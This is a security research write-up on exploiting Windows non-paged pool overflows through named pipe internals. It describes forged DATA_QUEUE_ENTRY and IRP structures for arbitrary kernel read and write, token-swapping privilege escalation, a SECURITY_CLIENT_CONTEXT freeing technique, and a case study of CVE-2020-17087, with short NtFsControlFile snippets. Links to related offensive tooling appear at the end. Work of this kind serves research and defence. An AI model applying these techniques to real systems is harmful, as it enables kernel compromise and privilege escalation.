Techniques based on named pipes for pool overflow exploitation targeting the most recent (and oldest) Windows versions

Overview

Table of Contents

Introduction

In this document we provide a series of techniques that can be used to exploit overflows in the non-paged pool on Windows. The techniques (ab)use the functionalities provided by the named pipe file system (npfs) to turn the overflow into arbitrary read/write and escalate privileges.

The following table shows the exploitability coverage provided by the present document over different overflow categories, which is based on the level of control over the:

  1. Overflow data. In other words, is the overflow composed by user data or "random" data? e.g. memcpy(vulnerable_chunk, user_controlled_data, overflow_size) vs memset(vulnerable_chunk, 0, overflow_size)
  2. Overflow size. memcpy(vulnerable_chunk, input_buffer, user_controlled_size) vs memcpy(vulnerable_chunk, input_buffer, random_size)
Overflow Size Control No Overflow Size Control
Overflow Data Control
No Overflow Data Control

Previously documented techniques on the topic fell primarily under the category "Overflow Data Control && Overflow Size Control" and the goal of this research was to expand that coverage. For further discussion of the table above, see the "Approaching Different Pool Overflow Categories" chapter.

Now we will get into the concepts related to named pipes that would allow us to build the exploitation primitives.

Named-Pipes Introduction

Named pipes are an inter-process communication mechanism that allows two processes potentially belonging to different computers to share data. A brief description of its operations (for more information see [1]), a named pipe connection has the server end, which creates the pipe, and the client end, which connects to that pipe. When a named-pipe connection is established, the underlying driver creates two queues, one for each end, within the Context Control Block (CCB). The CCB, in the context of the npfs, is an undocumented structure used to hold information about a particular server/client connection. Those queues found within the CCB store entries that are primarily related to data written by "the other" end or pending read operations by the current end. The structure used for the queue entries is the following:

struct DATA_QUEUE_ENTRY {
    LIST_ENTRY NextEntry;
    _IRP* Irp;
    _SECURITY_CLIENT_CONTEXT* SecurityContext;
    uint32_t EntryType;
    uint32_t QuotaInEntry;
    uint32_t DataSize;
    uint32_t x;
    char Data[];
}

Note: this is an undocumented structure, some information was obtained through ReactOS

An overview of the fields above and some of the mechanisms implemented by npfs:

NextEntry: used to create a circular linked list with all the queued data entries. Entries are primarily related to read and write operations. One way of creating write operation entries is through the WriteFile API call and those entries are removed from the list when all of their data are read by a client (e.g. using the ReadFile). The list includes a sentinel node, which is stored within the CCB of the named pipe.

SecurityContext:

nt!_SECURITY_CLIENT_CONTEXT
   +0x000 SecurityQos      : _SECURITY_QUALITY_OF_SERVICE
   +0x010 ClientToken      : Ptr64 Void
   +0x018 DirectlyAccessClientToken : UChar
   +0x019 DirectAccessEffectiveOnly : UChar
   +0x01a ServerIsRemote   : UChar
   +0x01c ClientTokenControl : _TOKEN_CONTROL

This field enables the server end of a named pipe to impersonate the security context of a client. An overview of how it works:

  1. The client writes some data to the server queue.
  2. A DATA_QUEUE_ENTRY is created and its SecurityContext is populated with the current security context of the client
  3. Steps (1),(2) can be repeated, each time capturing the security context of the client
  4. After the server attempts to perform a read operation (and if there was no previous call to the FSCTL_XXX=0x110044 operation, see below), the SecurityContext of the current entry will be stored in the CCB of the named pipe connection. Interestingly, this step is also performed in the peek operation.

The server can then call the ImpersonateNamedPipeClient which will attempt to impersonate the security context stored in the CCB after step (4)

It is noted that npfs exposes two file system operations related to impersonation.

  1. FSCTL_XXX=0x11001C: this is the operation called with ImpersonateNamedPipeClient. The underlying code appears to be an inlined-optimized version of a call to NpImpersonate with specific arguments through which it attempts to impersonate the security context stored in the Ccb.
  2. FSCTL_XXX=0x110044: calls the NpImpersonate directly with specific arguments that cause the impersonation functionality to be permanently disabled for the given np connection. So step (4) above only works if there was no previous call to this operation.

EntryType: Data entries can have different types which change the way data in the structure are treated. Two important types are buffered and unbuffered entries.

Buffered Entries:

The DATA_QUEUE_ENTRY allocated is big enough to hold the actual data of the request. Buffered entries are subject to the quota management mechanism which we will see later on and can be created through the regular WriteFile API call.

Unbuffered Entries:

The DATA_QUEUE_ENTRY allocated is big enough to hold the header without the data. The Irp related to the request is linked to the entry and references the actual data of the request. One way to create unbuffered entries is by calling the NpInternalWrite (FSCTL_XXX: 0x119FF8).

Irp: the IRP associated with the DATA_QUEUE_ENTRY. Two of the cases where this field is populated are:

a) When we have unbuffered entries

b) When a buffered entry is created with its size exceeding the available pipe quota.

QuotaInEntry: This is a field used to denote the quota consumed by the particular entry. For unbuffered entries is 0. In buffered entries, it starts with the DataSize and decreases with every read until its value is dropped to 0.

DataSize: This is the length of the user data associated with the current DATA_QUEUE_ENTRY

x: this field is uninitialized in the entry creation, probably used for padding

Quota management mechanism: allows the server-end of the communication channel to specify the maximum size of data the queues can hold. When that limit is exceeded:

  1. In blocking mode (PIPE_WAIT) the entry is created with QuotaInEntry set to the number of bytes available in the current queue. Then, after every read (not peek) operation on a buffered entry, the read size gets added to the QuotaInEntry of the stalled write. When the QuotaInEntry becomes equal to the DataSize, that signals that there is enough space to hold that entry in the pipe's quota and its associated irp gets completed.
  2. In non-blocking mode (PIPE_NOWAIT), the operation will fail. (the number of written bytes will be equal to 0)

Exploitation

Spraying the non-paged pool

In the past, Alex Ionescu has documented in a blogpost[2] the use of buffered entries to spray the non-paged pool. Another simple way of spraying the non-paged pool is through the use of unbuffered entries. As we have seen before, unbuffered entries allow memory allocation with complete control over both the size and the data (e.g. no DATA_QUEUE_ENTRY headers). The fact that we have full control over the data make unbuffered entries more suitable for some cases since:

  1. They can be used to forge data structures with complete precision (e.g. when exploiting UAF issues)
  2. The operation that involves a forged data structure might have to free the object at the end of its procedure. If our forged structure is not aligned at the beginning of a pool chunk, it will cause a bug check in most allocators (probably all allocators except LFH) during the free procedure.

The following code can be used to create unbuffered entries:

//create the pipe/file in FILE_FLAG_OVERLAPPED mode (blocking mode)
NtFsControlFile(pipe_handle, 0, 0, 0, &isb, 0x119FF8, buf, sz, 0, 0);

It is noted that unbuffered entries are created mainly through the NpInternal* functions and it's not certain whether those functionalities are meant to be exposed to userspace code. For example, NpInternalTransceive doesn't permit direct calls from userspace programs.

Memory Disclosure/Arbitrary Read

Complete control over the overflow data

  1. Establish an arbitrary read by using the overflow to rewrite the DATA_QUEUE_ENTRY headers and forge an unbuffered entry. This technique was first documented by Corentin Bayet and Paul Fariello in [3]. It is noted that this was also the first research documenting the use of named pipes to establish a read primitive and exploit a pool overflow.

The forged entry would look like this:

DATA_QUEUE_ENTRY:
 NextEntry=whatever;
 Irp=Forged IRP Address;
 SecurityContext=ideally 0;
 EntryType=1;
 QuotaInEntry=ideally 0;
 DataSize=arbitrary read size;
 x=whatever;
 
IRP->SystemBuffer = arbitrary read address

For convenience, we can set the Irp to a userspace address (and in the absence of SMAP), but that's not our only option.

  1. Disclose the memory adjacent to the overflown chunk by using the overflow to rewrite the DATA_QUEUE_ENTRY headers and forge a buffered entry with DataSize bigger than the original value. This technique appears to be first documented by @scwuaptx through a HITCON CTF challenge [4].

    This technique can be used to leak pointers/heap metadata and other interesting data that could be found/placed after our DATA_QUEUE_ENTRY.

    To make this work, the forged DATA_QUEUE_ENTRY should look like this:

    DATA_QUEUE_ENTRY:
     NextEntry=whatever;
     Irp=ideally 0;
     SecurityContext=ideally 0;
     EntryType=0;
     QuotaInEntry=ideally 0; //mostly irrelevent in case we use the peek operation
     DataSize=something bigger than the original size;
     x=whatever;
    

Limited control over the overflow data

There are some cases where we might have a limited set of characters in our disposal to overflow the memory with (e.g. RtlZeroMemory(buffer, bufferlen+1)). In those cases, we can overflow the Flink of a DATA_QUEUE_ENTRY and make it point to a location where we have full control over the data. We can then use the techniques previously described to establish the memory reads. In most supported 64 bit architectures we have to be careful to craft canonical addresses. When this is taken under consideration and assuming little endian architecture, one easy way to redirect the Flink to a controlled location is to overwrite the first couple of bytes, since that will make the DATA_QUEUE_ENTRY point to a memory location near the current entry. Then with proper heap grooming, we make that location contain the forged DATA_QUEUE_ENTRY for relative/arbitrary memory reads.

This technique is illustrated below:

In this diagram, we assume that we got an overflow and managed to redirect the Flink to the Data part of the buffered DATA_QUEUE_ENTRY. (e.g. replace the first byte of a segment pool allocation entry with the byte sizeof(DATA_QUEUE_ENTRY)%256). We then use the memory disclosure technique described before to leak the data of "heap chunk 2"

After getting the layout above, what's left is to read DataSize+DataSize1-sizeof(DATA_QUEUE_ENTRY)+n after which we will be able to read n bytes from "chunk 2". The DataSize2 should be at least DataSize1-sizeof(DATA_QUEUE_ENTRY)+n

In practice, there is one more challenge before using this technique. After Windows 7, Microsoft implemented safe-unlinking in the LIST_ENTRY members. Based on that, after reading DataSize bytes, the overflown DATA_QUEUE_ENTRY will get removed from the queue and the Flink/Blink will be validated, which in our case will trigger a bug check (entry->Flink->Blink!=entry). Fortunately, we can perform a "read-only" operation on the pipe queue through the use of PeekNamedPipe and work around this issue.

So a practical approach to what we discussed here is:

  1. Groom the pool memory to ensure the overwritten Flink will be displaced to a memory location containing the forged DATA_QUEUE_ENTRY. The forged data entry will facilitate a relative memory disclosure. The Flink of the forged data entry should point to a memory location which the user can modify, like for example a userspace address.
  2. Overflow the Flink. (with this approach we only have to trigger this step once)
  3. Use PeekNamedPipe with size<DataSize+DataSize2 to activate the first forged DATA_QUEUE_ENTRY and leak adjacent pool memory. Goal here is to leak some interesting pointers and bypass ASLR. A data entry is a perfect fit for our purpose.
  4. Modify the contents of the specified userspace address to hold a forged DATA_QUEUE_ENTRY that facilitates the arbitrary read. Use PeekNamedPipe with size=DataSize+DataSize2+n to leak n bytes from the address set in the SystenBuffer of the IRP.
  5. Repeat steps (3) or (4) as deemed necessary

The approach discussed here is illustrated below:

Arbitrary Write

Similarly with arbitrary read, establishing any sort of write primitive using named pipes became more difficult with the hardened LIST_ENTRY operations. On Windows 7 for example, it is possible to write a kernel address (queue sentinel node in Ccb) to an arbitrary location. We could have done it by forging a DATA_QUEUE_ENTRY, with its Flink set to the target address and then reading the whole data entry. That would cause the data entry to get unlinked from the list which would cause the execution of dqe->Flink->Blink=dqe->Blink. As a target address we could have potentially used the size field of a suitable gdi object.

Post-Windows 7, we have to follow a different strategy. Here we assume that we have already established the relative/arbitrary read primitive suggested in "Limited control over the overflow data" chapter. So the plan is to abuse the quota management mechanism we discussed earlier on to forge a DATA_QUEUE_ENTRY that simulates a stalled write, through which we forge an IRP that would establish the arbitrary write upon the completion of the IRP.

Now the biggest challenge is forging a valid IRP that would allow us to establish the arbitrary write upon completion. Since IRP is a complicated structure and is legitimately processed by the kernel (i.e. IofCompleteRequest) and not the npfs which was the case in the Arbitrary Read technique, we have to be precise. The simplest way i found to achieve that was to create a data entry that contains an IRP, use the arbitrary read to read that IRP, convert the IRP to perform the arbitrary write and create an unbuffered entry* to hold the forged IRP. Then, with the forged IRP in place, we just make some room in the queue by reading some data and we should be able to cause the completion of our forged IRP and thus establish the arbitrary write.

*: It's important to use an unbuffered entry to hold the forged IRP since it will most likely get deallocated by the end of the call to IofCompleteRequest.

The simulated stalled DATA_QUEUE_ENTRY and forged IRP could look like this:

DATA_QUEUE_ENTRY:
 NextEntry.Flink=accessible address;
 Irp=Forged IRP Address;
 SecurityContext=ideally 0;
 EntryType=0;
 QuotaInEntry=0;
 DataSize=arbitrary write size;
 x=whatever;
 
Forged IRP:
 Flags=Flags&~IRP_DEALLOCATE_BUFFER|IRP_BUFFERED_IO|IRP_INPUT_OPERATION;
 AssociatedIrp=Source Address;
 UserBuffer=Destination Address;
 ThreadListEntry.Flink->Blink==ThreadListEntry.Blink->Flink==&ForgedIRPAddr->ThreadListEntry;

To summarize:

  1. Spray the memory with data queue entries
  2. Use the steps laid out in the "Limited control over the overflow data" section to establish the relative/arbitrary read
  3. After step (1), it's likely that an adjacent chunk that can be reached through our relative read will hold a data entry. Identify that chunk and its handle (e.g. unique identifier in the Userdata or bruteforce), and find its address (dqe->Flink->Blink).
  4. Create a data entry on the identified handle that will have an IRP. I have tested this with buffered entry while on exceeded pipe quota but it should also work for unbuffered entries.
  5. The new entry should be added to the data queue next to the leaked entry. Use the arbitrary read to find the address of the newly created entry (leaked_entry->Flink), its IRP address and finally the IRP data.
  6. With access to the IRP we identify the associated ETHREAD/EPROCESS and the system process by following the ActiveProcessLinks. We then note down the token addresses of the current process and the system process.
  7. Modify the IRP to enable the arbitrary write as shown above from the system token address to the current process token address with length=8.
  8. Read DataSize bytes (8 in this case) to trigger the arbitrary write.

Arbitrary Freeing of SECURITY_CLIENT_CONTEXT Objects

This could be an alternative to arbitrary write for escalating privileges. As we have already seen, after each read operation on a data entry there will be an attempt to determine whether the current SecurityContext should be stored in the current Ccb or not. What's interesting for our purpose is the fact that in case the SecurityContext field of the DATA_QUEUE_ENTRY is populated, there would be a call to the NpFreeClientSecurityContext with argument one of the following two:

  1. the SecurityContext stored DATA_QUEUE_ENTRY in case the client impersonation is disabled as described in the intro.
  2. the SecurityContext stored in the Ccb in case impersonation is enabled. Essentially clean up the old context before replacing it with the new one.

The option (1) appears to be more more straightforward since it frees the security context found in the current entry instead of the previous one, but any of the two should be usable.

So a high-level overview of how this could potentially be exploited is to forge a SECURITY_CLIENT_CONTEXT structure that is impersonable by the server, holds elevated privileges but doesn't require special permissions to impersonate (e.g. see the remarks).

Steps:

  1. The steps at the beginning should be similar to the arbitrary write process. first, we establish the relative/arbitrary read, leak irp data, find current thread/process and potentially other elevated tokens that would enable us to construct that special token that is impersonable without permissions.
  2. Find the pipe handle and the address of an entry that is different from the one used to establish the read/free primitive. Let's call it pipe_handle_client/pipe_handle_server.
  3. Create n entries writing into the pipe_handle_client
  4. Start from the last entry and read its SecurityContext using the arbitrary read
  5. Trigger the arbitrary free on the address acquired in step (4)
  6. Spray unbuffered entries with the forged SECURITY_CLIENT_CONTEXT created in (1)
  7. Use the arbitrary read to verify whether we managed to replace the memory pointed by the stored SecurityClient context in (4) with the forged SECURITY_CLIENT_CONTEXT
  8. If that fails, go to the previous data entry (Blink) and repeat step (4). Entries for which we were unable to allocate our forged SCC should be considered corrupted and an attempt to read from them will most likely trigger a BSOD. That's why we start from the end of the list and move backward, we have n tries to allocate the forged structure.
  9. Read all the entries in pipe_handle_server until at least one byte is read from the overwritten SecurityContext (no more than its DataSize). At that point, the ClientContext with the forged data should already be copied to the Ccb of the pipe.
  10. Call ImpersonateNamedPipeClient on the pipe_handle_server

In the limited time spent testing this, i was able to attach a forged token to a thread, but the forged _TOKEN structure had some inconsistencies that needed fixing (e.g. integrity checks and fields pointing at absolute addresses within the token itself). Nevertheless, with some effort it should be possible to escalate using this technique.

Approaching Different Pool Overflow Categories

Now we will have an overview of how the discussed techniques could be used in different overflow scenarios. Let's revisit the table we've seen in the introduction:

Overflow Size Control No Overflow Size Control
Overflow Data Control
No Overflow Data Control
  1. Data Control && Size Control

    All of the techniques discussed here should be applicable.

  2. Data Control && No Size Control

    The exploitation of the overflows in this category should be similar to the overflows found in "No Data Control && No Size Control" which is described below. The only difference is that we have control over the overflow data and as such we can avoid the problem of corrupted pipes. For example, as overflow data we can repeatedly use an address under our control (e.g. userspace virtual address) that holds a forged data entry. (e.g. overflow_data=struct.pack("<Q", userspace_address)*overflow_size/8+victim_entry_flink_bytes). The goal is to make the "padding memory" data entries look like this:

    DATA_QUEUE_ENTRY:
     NextEntry=userspace_address;
     Irp=userspace_address;
     SecurityContext=userspace_address;
     EntryType=userspace_address;
     QuotaInEntry=userspace_address;
     DataSize=userspace_address;
     x=userspace_address;
    

    Based on the implementation of the function NpReadDataQueueEntry, which is used for the read operations, data entries with EntryType values bigger than one are skipped safely (i.e. NextEntry is used) when a peek operation is performed. So we can use the peek operation to identify the victim_entry, since the "padding memory" entries would use the forged data entry in the userspace_address in contrast to the victim entry that would use the forged entry specified in the redirected Flink.

  3. No Data Control && Size Control

    Here we should be able to use the techniques related to the Flink overflow in the "Limited control over the overflow data".

  4. No Data Control && No Size Control

    This should be the most challenging overflow category to exploit. Its exploitability will be heavily dependent on the specifics of the underlying case. Let's say we have an overflow caused by something like this: memset(vulnerable_chunk, 0, overflow_size)

    The diagram below illustrates our initial state:

Since we have no control over the overflow data, we can try to plug the technique described over the "Limited control over the overflow data". The goal now is to place a DATA_QUEUE_ENTRY near the end of the overflown area and attempt to have its Flink partially overflown (ideally 1-2 bytes)

This approach is illustrated below:

As we can see in the diagram, it might be necessary to have a padding memory between the vulnerable chunk and victim entry to have the victim entry properly aligned for the overflow.

The size of padding memory required really depends on the vulnerable_chunk size and the overflow_size. Based on these, we have two possibilities:

i. No padding memory is required. In this case we can proceed normally with the rest of the steps to establish the read/write primitives. An example of this case is provided in the vulnerable_driver, where we essentially deal with an off-by-one overflow.

ii. Padding memory is needed. This is normally the case when overflow_size-vulnerable_chunk_size>usable_overflow_size+userlying_pool_header_size

To better understand when this situation might come up, let's briefly go through CVE-2020-17087, since it's one case where padding memory should be required.

The parameters of the overflow are the following:

vulnerable_chunk_size = (user_controlled_size*6)%65536;
vulnerable_chunk = AllocateMemory(vulnerable_chunk_size);
memset(vulnerable_chunk, 0x30, user_controlled_size*6); //not the same, but mostly equivalent

In this case we can have the following overflow parameters:

user_controlled_size = 0x2ae3; //in practice, for this instance this appears to be the only usable size (for this technique)
vulnerable_chunk_size = (0x2ae3*6)%65536 = 0x152;
vulnerable_chunk = AllocateMemory(0x152); //it falls into the 0x170 LFH bucket
memset(vulnerable_chunk, 0x30, 0x10152);

To exploit this issue with the Flink overflow technique, the following memory layout is required:

So, we have a usable_overflow_size=1-4, which is the number of bytes needed to use our technique and overflow the Flink, but the overflow is way beyond that: 0x10152-0x170 bytes. The bytes beyond those used for the Flink overflow represent the padding memory.

Now to make things work, we have to have control over the allocations in the padding memory before the overlflow. That's because we don't want any operations performed within that memory after the overflow, since everything is going to be overwritten (e.g. corrupted pool allocator metadata, data structures, etc). Some options for dealing with the padding memory:

a. In case we are in medium integrity, spray the memory with objects the address of which we can leak (e.g. NtQuerySystemInformation) and make sure we have the appropriate pool layout before triggering the overflow.

b. In low-integrity, we use data entries to fill that memory. The biggest challenge here is the identification of the victim entry after the overflow. After the overflow, the state we are left with includes is a bunch of corrupted data entries (the entries that fill the padding memory) and only one valid entry (victim entry). In this situation, we have a problem that derives from the fact that the pool chunk allocation order does not always translate to the order the chunks are placed into memory (e.g. chunkB is allocated after chunkA, but it might be placed before chunkA in memory). For example, this is the expected behavior when the LFH services our pool chunk size. In addition, operations performed on the corrupted pipes should lead to a BSOD.

Given the above, we can't always know/calculate where the victim_entry handle is. Unfortunately, I couldn't identify a solid solution to this problem. Nevertheless, since this capability would allow us to have a universal set of techniques that would work on virtually any non-paged pool overflow situation, I have dedicated the chapter "Identifying Corrupted Pipes" to discuss the topic in more depth.

Identifying Corrupted Pipes

In some cases, it's useful to have the ability to identify pipes with corrupted data entries. For example, when the overflow is caused by an integer overflow. (e.g. something similar with CVE-2020-17087)

So we are now in the state shown in the diagram, we have the victim entry whose headers have been rewritten to facilitate the read/write primitive, but several data entries have been corrupted in the process. The problem here is that we normally don't know which pipe handle corresponds to the valid victim entry. One way to find it is to iterate over all the pipe handles and perform an operation that would verify that we are dealing with the victim entry (e.g. read operation that leaks next chunk data). In our instance, this is not a great approach as most operations on corrupted entries (e.g. read) will most likely cause a momentary change in the background image (i.e. cause BSOD). So we want to skip over them.

Two approaches to achieve that could be:

  1. Extract some of the headers of the data entry itself and validate their values. In practice, using the peek operation, we can extract the DataSize field as shown below:
PeekNamedPipe(pipe_handle, buf, 0, 0, 0, &remaining);
//remaining=FirstEntry->DataSize-alreadyRead
//so if remaining=="AAAAAAAAAA" it's most likely corrupted
  1. Find a functionality in npfs that can work through a corrupted data entry, and its control flow/responses depend on the DATA_QUEUE_ENTRY headers. For example, by calling the operation that corresponds to the code 0x116000 with read length equal to 0, the NpReadDataQueue will follow different code paths based on the value of the EntryType. If the EntryType is greater than 1, then the isb.Status will be equal to 0 otherwise it will be 0x80000005 (note, there is also a semi-reliable timing channel that allows us to determine which path was taken):
NtFsControlFile(pipe_handle, 0, 0, 0, &isb, 0x116000, buf, 0, buf, 0);
//isb.Status==0?"corrupted":"good" (assuming the overflow written something different to 0,1)

On the downside, there is a limitation with the examples provided above: they only work for pipes created with the PIPE_TYPE_MESSAGE flag. This is not ideal since in practice we are not able to use the Peek operation to go pass the first data entry and utilize the specially crafted Flink to activate our forged data entries (i.e. the approach used in "Limited control over the overflow data").

This behavior of the peek operation is a bit counter-intuitive (maybe a bug?) since the read mode of the operation is normally based on the read mode of the pipe and not its type mode. This is actually true for the ReadFile (i.e. uses read mode) but not for the peek operation (uses the type mode). In the documentation of PeekNamedPipe we see an attempt to explain this behavior (i.e. "The data is read in the mode specified with CreateNamedPipe. For example, create a pipe with PIPE_TYPE_MESSAGE | PIPE_READMODE_MESSAGE. If you change the mode to PIPE_READMODE_BYTE with SetNamedPipeHandleState, ReadFile will read in byte mode, but PeekNamedPipe will continue to read in message mode"). The problem is that this behavior remains even when the pipe is opened with "PIPE_TYPE_MESSAGE | PIPE_READMODE_BYTE", which doesn't appear to be conforming with the documentation.

Leaking The Contents of the Overflown Data

Other than spraying and forging data structures, unbuffered entries can also be used to leak the overflown data. This is true, since their chunks in memory are composed 100% by the user data, so there is no risk of corruption after the overflow (the pool header, if exists, it would still be corrupted). So after the overflow, the unbuffered entry will be filled with the overflow data which we should be able to read afterwards.

Potential use-cases:

  1. Leak potentially valuable information (e.g. interesting addresses)
  2. If we control the overflow data, then that could be used potentially to determine some information about the LFH state (or not)
  3. Let's say we are targeting the Low Fragmentation Heap (LFH) and we have the problem previously described with identifying corrupted pipes. We know that a subsegment can hold x objects of a target size and we also assume that subsegments are allocated sequentially. So we allocate 2*x unbuffered entries and 1 buffered. We repeatedly induce the overflow (prerequisite is a reliable way of inducing the vulnerability) until the overflow hits one of the buffered entries. We then go sequentially with the allocation order through our pipes, read their contents and find the last unbuffered overflown entry (overflown_unbuffered_entry_index). The buffered entry allocated within the range of: overflown_unbuffered_entry_index-x to overflown_unbuffered_entry_index+x should be the victim_entry
  4. Maybe some other more practical usecases:)

Future work

  1. Find a way to identify corrupted pipes in PIPE_TYPE_BYTE mode (should be a difficult task) or try to have Microsoft fix this important bug! (probably even more difficult task). This would allow us to earn the final for the category "No Data Control && No Size Control". It is also noted that the exploit of CVE-2020-17087 found to be used in the wild appears to use named pipes to establish the read/write primitives. This could mean one of the following:

    a. There is a solution to the corrupted pipe identification.

    b. There is a set of different techniques than those described here with more capabilities

    c. The exploit might have used some other 0days to bind everything together

  2. It should be interesting to escalate privileges through the SECURITY_CLIENT_CONTEXT approach. (challenging but should be feasible)

References

  1. https://docs.microsoft.com/en-us/windows/win32/ipc/named-pipes
  2. Alex Ionescu. "Sheep Year Kernel Heap Fengshui: Spraying in the Big Kids’ Pool". https://www.alex-ionescu.com/?p=231
  3. Corentin Bayet and Paul Fariello. "Scoop the Windows 10 pool!". https://github.com/synacktiv/Windows-kernel-SegmentHeap-Aligned-Chunk-Confusion
  4. @scwuaptx. https://github.com/scwuaptx/CTF/tree/master/2020-writeup/hitcon/lucifer
You might also like...
 	Cobalt Strike is a commercial, full-featured, remote access tool that bills itself as
Cobalt Strike is a commercial, full-featured, remote access tool that bills itself as "adversary simulation software designed to execute targeted attacks and emulate the post-exploitation actions of advanced threat actors".

COBALT STRIKE 4.4 Cobalt Strike is a commercial, full-featured, remote access tool that bills itself as "adversary simulation software designed to exe

OverRide - Binary Exploitation and Reverse-Engineering (from assembly into C)
OverRide - Binary Exploitation and Reverse-Engineering (from assembly into C)

OverRide Explore disassembly, binary exploitation & reverse-engineering through 10 little challenges. In the folder for each level you will find: flag

Vulnerability Exploitation Code Collection Repository
Vulnerability Exploitation Code Collection Repository

Introduction expbox is an exploit code collection repository List Strapi CMS 3.0.0-beta.17.4 - Remote Code Execution curl -i -s -k -X $'POST' -H $'Hos

vdk is a set of utilities used to help with exploitation of a vulnerable driver.

vdk - vulnerable driver kit vdk is a set of utilities used to help with exploitation of a vulnerable driver. There are 2 main features of this library

A Fingerprint Door Lock using a microprocessor named Arduino UNO and programming through Arduino IDE
A Fingerprint Door Lock using a microprocessor named Arduino UNO and programming through Arduino IDE

INSTRUCTIONS - The codes for the Fingerprint Door lock are present in the Code For Fingerprint Door Lock folder The instructions of how to operate the

RISCAL is a 32-bit reduced instruction-set computer (RISC) designed for learning and research purposes. It is named after my dog, Rascal.

RISCAL CPU RISCAL is a 32-bit custom instruction set architecture virtual machine. It is intended to be used for learning/research purposes. In a nuts

Servo library with stm developed by the Liek Software Team. We are working on new versions.

Liek-Servo-Library Liek Servo Library is a library that makes it easy for you to drive servo motors with STM32F10x series cards. The library is still

A simple-to-build ortholinear keyboard named after a famous penguin
A simple-to-build ortholinear keyboard named after a famous penguin

Nils Olav A simple-to-build, low-profile, ortholinear keyboard named after a famous penguin. This keyboard is based around the Elite-C v4. It features

Releases(v0.2.1)
Owner
null
Cobalt Strike BOF to list Windows Pipes & return their Owners & DACL Permissions

xPipe Cobalt Strike BOF (x64) Cobalt Strike Beacon Object File (BOF) to list active Pipes & return their Owner & Discretionary Access Control List (DA

Bobby Cooke 65 Nov 9, 2022
A water tank level sensor **Built With WisBlock** to detect overflow and low level conditions.

RAK12014 Laser TOF sensor coming soon WisBlock Watertank Level Sensor Watertank Overflow detection using the RAKwireless WisBlock modules. It implemen

Bernd Giesecke 3 Feb 3, 2022
A list of excellent resources for anyone to deepen their understanding with regards to Windows Kernel Exploitation and general low level security.

WinKernel-Resources A list of excellent resources for anyone trying to deepen their understanding with regards to Windows Kernel Exploitation and gene

Vector Security 55 Nov 12, 2022
Tiny and cheap robot car for inspecting sewer pipes >= 125 mm. With pan servo for the ESP32-Cam module

ESP32-Cam Sewer inspection car Version 1.0.0 - work in progress Based on esp32-cam-webserver by Owen Carter. Additional Features Pan servo for the ESP

Armin 5 Nov 6, 2022
Orca - Advanced Malware with multifeatures written in ASM/C/C++ , work on all windows versions ! (some features still under developing and not stable)

About Orca Orca is an Advanced Malware with multifeatures written in ASM/C/C++ features Run in Background (Hidden Mode) Records keystrokes and saves t

anas 182 Dec 26, 2022
Hobbyist Operating System targeting x86_64 systems. Includes userspace, Virtual File System, An InitFS (tarfs), Lua port, easy porting, a decent LibC and LibM, and a shell that supports: piping, file redirection, and more.

SynnixOS Epic Hobby OS targeting x86_64 CPUs, it includes some hacked together functionality for most essential OSs although, with interactivity via Q

RaidTheWeb 42 Oct 28, 2022
Patch for Sierra's PowerChess to run on newer Windows Versions >9x

What is it? I recently stumbled upon the following thread: https://sourceforge.net/p/dxwnd/discussion/general/thread/98dd46dfc6/?page=0 Some people we

null 2 Mar 27, 2022
A Windows user-mode shellcode execution tool that demonstrates various techniques that malware uses

Jektor Toolkit v1.0 This utility focuses on shellcode injection techniques to demonstrate methods that malware may use to execute shellcode on a victi

null 95 Sep 5, 2022
Embedded Flutter runtime targeting Embedded Linux with Wayland

ivi-homescreen IVI Homescreen for Wayland Strongly Typed (C++) Lightweight Clang 11 Release Stripped = 151k GCC 9.3 Release Stripped = 168k Source run

null 170 Dec 13, 2022
Violent Fungus is a command and control (C2) software suite, providing red teams post-exploitation persistence and other juicy stuff.

Violent Fungus is a command and control (C2) software suite, providing red teams post-exploitation persistence and other juicy stuff.

Chris Humphries 34 Sep 7, 2022